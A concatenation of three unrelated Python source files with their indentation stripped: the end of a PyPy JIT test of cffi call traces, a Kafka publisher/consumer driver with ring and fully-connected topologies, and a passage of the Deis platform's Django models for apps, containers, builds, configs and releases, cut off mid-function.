BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, 'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == 'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
f1 = call_release_gil(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in xrange(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i161 = int_lt(i160, i43)
guard_true(i161, descr=...)
i162 = int_add(i160, 1)
setfield_gc(p22, i162, descr=<FieldS pypy.module.__builtin__.functional.W_XRangeIterator.inst_current .>)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p165 = getarrayitem_gc(p67, 0, descr=<ArrayP .>)
guard_value(p165, ConstPtr(ptr70), descr=...)
p166 = getfield_gc(p165, descr=<FieldP pypy.objspace.std.dictmultiobject.W_DictMultiObject.inst_strategy .+>)
guard_value(p166, ConstPtr(ptr72), descr=...)
p167 = call(ConstClass(_ll_0_alloc_with_del___), descr=<Callr . EF=5>)
guard_no_exception(descr=...)
i112 = int_signext(i160, 2)
setfield_gc(p167, ConstPtr(ptr85), descr=<FieldP pypy.module._cffi_backend.cdataobj.W_CData.inst_ctype .+>)
i114 = int_ne(i160, i112)
guard_false(i114, descr=...)
--TICK--
i119 = call(ConstClass(_ll_1_raw_malloc_varsize__Signed), 6, descr=<Calli . i EF=5 OS=110>)
raw_store(i119, 0, i160, descr=<ArrayS 2>)
raw_store(i119, 2, i160, descr=<ArrayS 2>)
raw_store(i119, 4, i160, descr=<ArrayS 2>)
setfield_gc(p167, i119, descr=<FieldU pypy.module._cffi_backend.cdataobj.W_CData.inst__ptr .+>)
i123 = arraylen_gc(p67, descr=<ArrayP .>)
jump(..., descr=...)
""")
|
driver.py | from appl.kafka_interface import TopicConsumer, TopicPublisher
import sys
import threading
import traceback
import logging
LOG = logging.getLogger("root")
# Constants
bootstrap_servers = '127.0.0.1:9092'
kafka_conf = {"bootstrap.servers": bootstrap_servers}
class ApplicationState:
def __init__(self):
self.publisher = None
self.consumers = None
self.pub_thread = None
self.con_threads = None
def set(self, publisher, consumers, t_pub, t_consumers):
self.publisher = publisher
self.consumers = consumers
self.pub_thread = t_pub
self.con_threads = t_consumers
def wait_for_threads_to_join(app_state):
app_state.pub_thread.join()
# print("Publisher completed....")
for t_con in app_state.con_threads:
t_con.join()
def add_neighbors_for_ring_topology(consumers, partition_count):
LOG.debug("Using ring topology")
# Ring topology
for i in range(1, partition_count):
consumers[i - 1].set_neighbors([consumers[i].model])
consumers[partition_count - 1].set_neighbors([consumers[0].model])
def add_neighbors_for_fully_connected_topology(consumers, partition_count):
LOG.debug("Using fully-connected topology")
# Fully-connected topology
for i in range(0, partition_count):
neighbors = []
for j in range(0, partition_count):
if i != j:
neighbors.append(consumers[j].model)
consumers[i].set_neighbors(neighbors)
def start_publisher_and_consumers(topic,
partition_count,
dataset_location,
application_state,
topology=None,
step=50,
end=None):
try:
publisher = TopicPublisher(topic, partition_count, dataset_location, kafka_conf, step)
publisher.init_kafka_env()
t_pub = threading.Thread(target=publisher.publish())
t_pub.name = 'publisher'
consumers = []
t_consumers = []
# partition numbers start with 0
for i in range(0, partition_count):
con = TopicConsumer("test-group-{}".format(i + 1), topic, i, bootstrap_servers, step, end, i + 1, partition_count, topology)
consumers.append(con)
if topology == "ring":
add_neighbors_for_ring_topology(consumers, partition_count)
elif topology == "fcg":
add_neighbors_for_fully_connected_topology(consumers, partition_count)
else:
LOG.info("No topology configured")
# print("Starting publisher...")
t_pub.start()
# print("Starting consumers...")
for i in range(0, partition_count):
t_con = threading.Thread(target=consumers[i].consume)
t_con.name = consumers[i].get_group_id()
t_con.start()
t_consumers.append(t_con)
application_state.set(publisher, consumers, t_pub, t_consumers)
except Exception:
traceback.print_exc(file=sys.stdout)
|
models.py | # -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
"""
Decorator to explicitly close db connections during threaded execution
Note this is necessary to work around:
https://code.djangoproject.com/ticket/22420
"""
def _close_db_connections(*args, **kwargs):
ret = None
try:
ret = func(*args, **kwargs)
finally:
from django.db import connections
for conn in connections.all():
conn.close()
return ret
return _close_db_connections
def log_event(app, msg, level=logging.INFO):
# controller needs to know which app this log comes from
logger.log(level, "{}: {}".format(app.id, msg))
app.log(msg, level)
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
if any(int(v) < 0 for v in value.viewvalues()):
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in settings.DEIS_RESERVED_NAMES:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
try:
crypto.load_certificate(crypto.FILETYPE_PEM, value)
except crypto.Error as e:
raise ValidationError('Could not load certificate: {}'.format(e))
def get_etcd_client():
if not hasattr(get_etcd_client, "client"):
# wire up etcd publishing if we can connect
try:
get_etcd_client.client = etcd.Client(
host=settings.ETCD_HOST,
port=int(settings.ETCD_PORT))
get_etcd_client.client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
get_etcd_client.client = None
return get_etcd_client.client
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
def select_app_name():
"""Select a unique randomly generated app name"""
name = utils.generate_app_name()
while App.objects.filter(id=name).exists():
name = utils.generate_app_name()
return name
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=select_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
@property
def _scheduler(self):
mod = importlib.import_module(settings.SCHEDULER_MODULE)
return mod.SchedulerClient(settings.SCHEDULER_URL,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS)
def __str__(self):
return self.id
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def _get_job_id(self, container_type):
app = self.id
release = self.release_set.latest()
version = "v{}".format(release.version)
job_id = "{app}_{version}.{container_type}".format(**locals())
return job_id
def _get_command(self, container_type):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
release = self.release_set.latest()
if release.build.dockerfile or not release.build.sha:
return "bash -c '{}'".format(release.build.procfile[container_type])
else:
return 'start {}'.format(container_type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if container_type == 'cmd' else 'start {}'.format(container_type)
def log(self, message, level=logging.INFO):
"""Logs a message in the context of this application.
This prefixes log messages with an application "tag" that the customized deis-logspout will
be on the lookout for. When it's seen, the message-- usually an application event of some
sort like releasing or scaling, will be considered as "belonging" to the application
instead of the controller and will be handled accordingly.
"""
logger.log(level, "[{}]: {}".format(self.id, message))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
try:
# attempt to remove containers from the scheduler
self._destroy_containers([c for c in self.container_set.exclude(type='run')])
except RuntimeError:
pass
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def restart(self, **kwargs):
to_restart = self.container_set.all()
if kwargs.get('type'):
to_restart = to_restart.filter(type=kwargs.get('type'))
if kwargs.get('num'):
to_restart = to_restart.filter(num=kwargs.get('num'))
self._restart_containers(to_restart)
return to_restart
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
try:
url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
requests.delete(url)
except Exception as e:
# Ignore errors deleting application logs. An error here should not interfere with
# the overall success of deleting an application, but we should log it.
err = 'Error deleting existing application logs: {}'.format(e)
log_event(self, err, logging.WARNING)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure:
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
scale_types = {}
# iterate on a copy of the container_type keys
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
scale_types[container_type] = requested
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if "scale" in dir(self._scheduler):
self._scale_containers(scale_types, to_remove)
else:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.exclude(type='run').values(
'type').annotate(Count('pk')).order_by()
new_structure = structure.copy()
new_structure.update({v['type']: v['pk__count'] for v in vals})
self.structure = new_structure
self.save()
return changed
def _scale_containers(self, scale_types, to_remove):
release = self.release_set.latest()
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'version': version,
'aname': self.id,
'num': scale_types[scale_type]}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.scale(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (scale): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in to_remove]
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
if not to_add:
return
create_threads = [Thread(target=c.create) for c in to_add]
start_threads = [Thread(target=c.start) for c in to_add]
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if any(c.state != 'created' for c in to_add):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(to_add)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set(['up']):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# if the user specified a health check, try checking to see if it's running
try:
config = self.config_set.latest()
if 'HEALTHCHECK_URL' in config.values.keys():
self._healthcheck(to_add, config.values)
except Config.DoesNotExist:
pass
def _healthcheck(self, containers, config):
# if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
intervals = [1.0, 0.1, 0.5, 1.0]
# HACK (bacongobbler): we need to wait until publisher has a chance to publish each
# service to etcd, which can take up to 20 seconds.
time.sleep(20)
for i in xrange(len(intervals)):
delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
try:
# sleep until the initial timeout is over
if delay > 0:
time.sleep(delay * intervals[i])
to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
self._do_healthcheck(to_healthcheck, config)
break
except exceptions.HealthcheckException as e:
try:
next_delay = delay * intervals[i+1]
msg = "{}; trying again in {} seconds".format(e, next_delay)
log_event(self, msg, logging.WARNING)
except IndexError:
log_event(self, e, logging.WARNING)
else:
self._destroy_containers(containers)
msg = "aborting, app containers failed to respond to health check"
log_event(self, msg, logging.ERROR)
raise RuntimeError(msg)
def _do_healthcheck(self, containers, config):
path = config.get('HEALTHCHECK_URL', '/')
timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
if not _etcd_client:
raise exceptions.HealthcheckException('no etcd client available')
for container in containers:
try:
key = "/deis/services/{self}/{container.job_id}".format(**locals())
url = "http://{}{}".format(_etcd_client.get(key).value, path)
response = requests.get(url, timeout=timeout)
if response.status_code != requests.codes.OK:
raise exceptions.HealthcheckException(
"app failed health check (got '{}', expected: '200')".format(
response.status_code))
except (requests.Timeout, requests.ConnectionError, KeyError) as e:
raise exceptions.HealthcheckException(
'failed to connect to container ({})'.format(e))
def _restart_containers(self, to_restart):
"""Restarts containers via the scheduler"""
if not to_restart:
return
stop_threads = [Thread(target=c.stop) for c in to_restart]
start_threads = [Thread(target=c.start) for c in to_restart]
[t.start() for t in stop_threads]
[t.join() for t in stop_threads]
if any(c.state != 'created' for c in to_restart):
err = 'warning, some containers failed to stop'
log_event(self, err, logging.WARNING)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if any(c.state != 'up' for c in to_restart):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
if not to_destroy:
return
destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == 'destroyed']
if any(c.state != 'destroyed' for c in to_destroy):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
scale_types = set()
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
scale_types.add(e.type)
if new and "deploy" in dir(self._scheduler):
self._deploy_app(scale_types, release, existing)
else:
self._start_containers(new)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if self.structure == {} and release.build is not None:
self._default_scale(user, release)
def _deploy_app(self, scale_types, release, existing):
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'aname': self.id,
'num': 0,
'version': version}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.deploy(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (deploy): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in existing]
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self, log_lines=str(settings.LOG_LINES)):
"""Return aggregated log data for this application."""
try:
url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
self.id, log_lines)
r = requests.get(url)
# Handle HTTP request errors
except requests.exceptions.RequestException as e:
logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
raise e
# Handle logs empty or not found
if r.status_code == 204 or r.status_code == 404:
logger.info("GET {} returned a {} status code".format(url, r.status_code))
raise EnvironmentError('Could not locate logs')
# Handle unanticipated status codes
if r.status_code != 200:
logger.error("Error accessing deis-logger: GET {} returned a {} status code"
.format(url, r.status_code))
raise EnvironmentError('Error accessing deis-logger')
return r.content
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
@property
def _scheduler(self):
return self.app._scheduler
@property
def state(self):
return self._scheduler.state(self.job_id).name
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
@property
def job_id(self):
version = "v{}".format(self.release.version)
return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@close_db_connections
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
try:
self._scheduler.create(
name=self.job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def start(self):
try:
self._scheduler.start(self.job_id)
except Exception as e:
err = '{} (start): {}'.format(self.job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@close_db_connections
def stop(self):
try:
self._scheduler.stop(self.job_id)
except Exception as e:
err = '{} (stop): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def destroy(self):
try:
self._scheduler.destroy(self.job_id)
except Exception as e:
err = '{} (destroy): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, **kwargs):
try:
previous_build = self.app.build_set.latest()
to_destroy = []
for proctype in previous_build.procfile:
if proctype not in self.procfile:
for c in self.app.container_set.filter(type=proctype):
to_destroy.append(c)
self.app._destroy_containers(to_destroy)
except Build.DoesNotExist:
pass
return super(Build, self).save(**kwargs)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.viewitems() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
log_event(self.app, e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_image = self.build.image
if ':' not in source_image:
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = "{}:{}".format(source_image, source_tag)
# If the build has a SHA, assume it's from deis-builder and in the deis-registry already
deis_registry = bool(self.build.sha)
publish_release(source_image, self.config.values, self.image, deis_registry)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 0')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
